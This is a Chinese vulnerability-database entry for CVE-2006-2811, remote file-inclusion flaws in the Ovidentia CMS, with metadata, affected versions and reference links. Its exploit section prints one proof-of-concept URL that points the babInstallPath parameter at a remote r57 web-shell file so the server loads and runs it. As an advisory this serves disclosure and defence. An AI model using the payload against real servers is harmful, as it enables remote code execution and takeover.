Ovidentia 多个输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110377 漏洞类型 输入验证
发布时间 2006-06-02 更新时间 2007-02-09
CVE编号 CVE-2006-2811 CNNVD-ID CNNVD-200606-090
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27956
https://www.securityfocus.com/bid/18232
https://cxsecurity.com/issue/WLB-2006060039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-090
|漏洞详情
Ovidentia是法国CANTICO团队开发的一套基于PHP和MySQL的开源内容管理系统和协作平台,它可用于发布和管理项目、出版和文章管理、日程共享等。Ovidentia处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。Ovidentia的多个脚本没有正确验证babInstallPath参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/18232/info
      
Ovidentia is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
      
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
      
http://www.example.com/orid/ovidentia/options.php?babInstallPath=http://www.example.com/r57.txt?
|受影响的产品
Ovidentia ovidentia 5.8 Ovidentia ovidentia 5.6.6 Ovidentia ovidentia 5.6.5 Ovidentia ovidentia 5.6.4 Ovidentia ovidentia 5.6.3
|参考资料

来源:BUGTRAQ
名称:20060531multiplefileinclusionexploitsinovidentiav5.8.0
链接:http://www.securityfocus.com/archive/1/archive/1/435590/100/0/threaded
来源:XF
名称:ovidentia-multiple-scripts-file-include(26981)
链接:http://xforce.iss.net/xforce/xfdb/26981
来源:BID
名称:18232
链接:http://www.securityfocus.com/bid/18232
来源:BUGTRAQ
名称:20070209OvidentiaExploitCodeds
链接:http://www.securityfocus.com/archive/1/archive/1/459572/100/0/threaded
来源:BUGTRAQ
名称:20070114Ovidentia5.6xSeriesRemoteFileİnclude
链接:http://www.securityfocus.com/archive/1/archive/1/456893/100/200/threaded
来源:OSVDB
名称:27229
链接:http://www.osvdb.org/27229
来源:OSVDB
名称:27228
链接:http://www.osvdb.org/27228
来源:OSVDB
名称:27227
链接:http://www.osvdb.org/27227
来源:OSVDB
名称:27226
链接:http://www.osvdb.org/27226
来源:OSVDB
名称:27225
链接:http://www.osvdb.org/27225
来源:OSVDB
名称:27224
链接:http://www.osvdb.org/27224
来源:OSVDB
名称:27223
链接:http://www.osvdb.org/27223
来源:OSVDB
名称:27222
链接:http://www.osvdb.org/27222
来源:OSVDB
名称:27221
链接:http://www.osvdb.org/27221
来源:OSVDB
名称:2